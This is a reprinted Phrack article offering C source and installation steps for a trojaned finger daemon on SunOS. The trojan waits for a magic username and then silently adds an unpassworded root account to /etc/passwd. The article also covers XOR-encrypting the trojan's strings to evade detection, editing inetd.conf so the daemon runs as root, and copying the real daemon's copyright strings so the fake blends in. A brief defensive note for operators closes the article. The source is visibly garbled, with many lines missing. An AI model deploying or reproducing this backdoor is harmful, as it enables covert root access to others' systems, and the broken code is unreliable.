
This is a reprint from a previous Phrack magazine.

So you have gained access to a system and want to keep on hacking without
being kicked off by a smart operator, there are dozen methods you can use,
usually, if an operator figure out that his system is under attack, he'll
check out the login program and telnetd for backdoors, then the telnet for
logging activities or network sniffers and so on..  if nothing is found
he'll realize the hacker is a dumb ass and he'll just modify the passwd to
prevent him from logging on (in most cases), here comes my fingerd trojan.
This scheme is quite original (I've never seen it used) and the source is
compact enough to be fitted into a MAG.  The fingerd as all you know (I
hope) is the finger server run by inetd when a client opens the finger
port (N.79), of course if the port is locked, or you have a network
firewall, do not use this code.

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/*  The Fingerd trojan by Hitman Italy
 *  This source cannot be spread without the whole article
 *  but you can freely implement or modify it for personal use

static char copyright[] = "";   /* Add the copyright string here */

static char sccsid[] = "";      /* Add the sccsid string here */


#define PATH_FINGER "/usr/ucb/finger"
#define CODE 161

char *HitCrypt(ch)
char *ch;
   char *b;
   while ((*(ch++)^=CODE)!=0x00);

int argc;
char *argv[];
   register FILE *fp;
   register int ch;
   register char *lp;
   int p[2];

static char exor[4][23]={
143,143,143,CODE} };

#define   ENTRIES   50
   char **ap, *av[ENTRIES + 1], line[1024], *strtok();

#ifdef LOGGING               /* unused, leave it for "strings" command */
   struct sockaddr_in sin;
   int sval;

   sval = sizeof(sin);
   if (getpeername(0, &sin, &sval) < 0)

   if (!fgets(line, sizeof(line), stdin))

   av[0] = "finger";

   for (lp = line, ap = &av[1];;) {
      *ap = strtok(lp, " \t\r\n");
      if (!*ap)
      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
         *ap = "-l";
      if (++ap == av + ENTRIES)
      lp = NULL;

   if (pipe(p) < 0)

   switch(fork()) {
   case 0:
      if (p[1] != 1) {
         (void)dup2(p[1], 1);

/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
   if (av[1])
       if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
        if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
        fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
        printf("%s\n", HitCrypt(&exor[3][0]));
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/

        if (execv(PATH_FINGER, av)==-1)
         fprintf(stderr,"No local finger program found\n");
   case -1:
   if (!(fp = fdopen(p[0], "r")))
   while ((ch = getc(fp)) != EOF) {


   char *prg,*msg;
   fprintf(stderr, "%s: ", prg);

--------- + CUT HERE + ----------------------------------------------

I think it's quite easy to understand, first of all, inetd opens the
socket and pipes the the input data through the fingerd

*  if (!fgets(line, sizeof(line), stdin))
*     exit(1);
*   av[0] = "finger";
*   for (lp = line, ap = &av[1];;) {
*      *ap = strtok(lp, " \t\r\n");
*      if (!*ap)
*         break;
*      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*         *ap = "-l";

here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any '/W' or '/w' old options in '-l'

*    switch(fork()) {
*   case 0:
*      (void)close(p[0]);
*      if (p[1] != 1) {
*         (void)dup2(p[1], 1);
*         (void)close(p[1]);
*      }

the task goes into the background

*        if (execv(PATH_FINGER, av)==-1)
*         fprintf(stderr,"No local finger program found\n");

here the daemon executes the local finger with remote parameters

*   (void)close(p[1]);
*   if (!(fp = fdopen(p[0], "r")))
*      fatal(argv[0],"fdopen");
*   while ((ch = getc(fp)) != EOF) {
*      putchar(ch);

the output is piped back to the remote system

That's how the finger daemon works...  now the trojan, basically we'll
check out the input finger user till the magic code matches, then our
sleepin' trojan will wake up and do the job...  let's examine my code

/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
   if (av[1])
       if (strcmp("hit",av[1])==0) {
        printf("Backdoor activated...\n");
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/

When the "hit" magic code matches the trojan will modify the passwd adding
a fake unpassworded root user named "hit", so you can relogin as root,
cover your tracks and keep on working.  Of course this is an example, you
can do what you want simply adding your custom code, you may remote cat a
log file without logging in, or remote kill an user, maybe root logins are
disabled so you have to make a suid shell and add a normal entry in the
passwd or open a port and so on, you can also use multiple codes if you
like.  If the magic word doesn't match of course the finger will work out

# finger hit@666.666.666.666
Backdoor activated...

Well done! You have gained a root access.
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
^^^ they run NIS... anyway our local root login will work fine

here is the log
user: xit001 from: ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)

That's really useful to collect logfiles without logging in and leave
tracks everywhere.

Now the problem....
If you want to use the fingerd to run world accessible commands you won't
have any problem but if you require root privileges check this out:

#grep fingerd /etc/inetd.conf
finger  stream  tcp     nowait  nobody  /usr/etc/in.fingerd     in.fingerd
On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
NFS etc..), as nobody of course you cannot modify the passwd, so edit the

finger  stream  tcp     nowait   root   /usr/etc/in.fingerd     in.fingerd

now you have to refesh the inetd process

#kill -HUP 

now you can do what you want, many unix clones let the fingerd running as
root by default...  and even if you have to modify the inetd.conf an
operator unlikely will realize what is appening since all other daemons
run as root.

Why have I crypted all data?
#strings login
Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)

Lame or not?  All alien data must be crypted..  a fast exor crypting
routine will work fine, of course you can use the standard crypt function
or other (slow) algorithms but since security is not important (we just
want to make our texts invisible) I suggest using my fast algo,to create
the exor matrix simply put all texts on a file and use the little
ExorCrypt utility I have included UUencoded below (amiga/msdos version).

echo > test "this is a test"
Acrypt test test.o
line crypted: 1
type test.o
static char exor[]={

char *ExorCrypt(ch)
char *ch;
   char *b;
   while ((*(ch++)^=0xa1)!=0x00);

The utility will create the exor vector (matrix) (from the 80 column
formatted ascii input text) and the specific decoding function, If you do
not supply a key "$a1" will be used, remember to add a NewLine if
necessary, the vector/matrix never contain them.

Before compiling the whole thing you must add the copyright and sccsid
strings I have not included (they may vary).
Let's simply do:  (SunOs)

#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
 All rights reserved.                       ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI           <<<< SCCSID STRING
No local finger program found

The top of source becomes:
static char copyright[]=
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
 All rights reserverd.\n";
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"

That's all. Now you can compile and install your fingerd trojan,
the source was adapted for SunOS but you can port it on many unix
clones without troubles.

Few final words to:

Operators: How to defeat this trojan? First of all check the inetd.conf,
           then do VARIOUS fingerd checksums (maybe even the "sum" command
           is a trojan :) if you discover the trojan wrap the finger port
           so you can track down the hacker (usually all wtmp/lastlog logs
           are removed) or wrap everything modifying the daemons, do NOT use
           the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
           tripwire entry to prevent future installations.
           Well...  if the hacker is a good one everything is useless.

Beginners: You must be root to install the trojan, remember to get a copy
           of the original fingerd program before installing the fake

           On a Sun do:
           #cc -o in.fingerd trojan.c
           #mv /usr/etc/in.fingerd fingerd.old
           #mv in.fingerd /usr/etc
           remember to check the /etc/inetd.conf
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